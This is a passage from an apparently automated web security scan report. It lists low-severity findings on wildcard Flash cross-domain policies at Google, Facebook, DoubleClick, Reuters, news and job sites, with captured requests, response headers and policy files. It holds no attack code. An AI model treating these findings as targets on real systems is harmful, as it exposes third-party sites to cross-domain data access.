Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.95. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:17:24 GMT
Expires: Sun, 04 Sep 2011 23:17:24 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 6476
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.96. http://picasaweb.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 01:23:13 GMT
Date: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

6.97. http://portfolio.us.reuters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portfolio.us.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: portfolio.us.reuters.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:23:24 GMT
Content-Length: 736
Content-Type: text/xml
Last-Modified: Tue, 24 Nov 2009 19:47:55 GMT
Accept-Ranges: bytes
ETag: "f8f85b43f6dca1:efb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" />
<al
...[SNIP]...
<allow-access-from domain="reuters.com" />
...[SNIP]...
<allow-access-from domain="reuters.com" />
...[SNIP]...
<allow-access-from domain="usa.qa.reuters.com" />
<allow-access-from domain="uk.qa.reuters.com" />
<allow-access-from domain="jp.qa.reuters.com" />
...[SNIP]...

6.98. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 04 Sep 2011 00:13:02 GMT
Expires: Mon, 05 Sep 2011 00:13:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 4222
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.99. http://rd.rlcdn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 500
Last-Modified: Fri, 02 Sep 2011 17:41:18 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.casualcollective.com" />
<allow-access-from domain="*.tubemogul.com" />
<allow-access-from domain="*.inplay.tubemogul.com" />
<allow-access-from domain="*.grooveshark.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adotube.com" />
...[SNIP]...

6.100. http://rtq.careerbuilder.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rtq.careerbuilder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rtq.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL43
Date: Sun, 04 Sep 2011 00:57:57 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.101. http://search.charlotteobserver.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.charlotteobserver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.charlotteobserver.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:44 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT
ETag: "ea0d60-df-4b2aab16"
Accept-Ranges: bytes
Content-Length: 223
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.charlotteobserver.com" />

...[SNIP]...

6.102. http://search2.sacbee.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search2.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: search2.sacbee.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:50 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Accept-Ranges: bytes
Content-Length: 373
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.103. http://snas.nbcuni.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:08 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

6.104. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Date: Sun, 04 Sep 2011 01:12:40 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.105. http://syndication.mmismm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:12:23 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:22:10 GMT
ETag: "10e-4a8db7b7df880"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

6.106. http://www.careerbuilder.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR9
Date: Sun, 04 Sep 2011 01:25:12 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.107. http://www.cars.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 14 May 2009 14:15:36 GMT
ETag: "9c4f-27a-f632f200"
Accept-Ranges: bytes
Content-Length: 634
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/xml
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:27 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.cars.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.2o7.net" />
...[SNIP]...

6.108. http://www.charlotteobserver.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT
ETag: "ea0d60-df-4b2aab16"
Content-Type: application/xml
Cache-Control: max-age=531
Date: Sun, 04 Sep 2011 01:00:13 GMT
Content-Length: 223
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.charlotteobserver.com" />

...[SNIP]...

6.109. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.198.64
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.110. http://www.fansonly.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fansonly.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

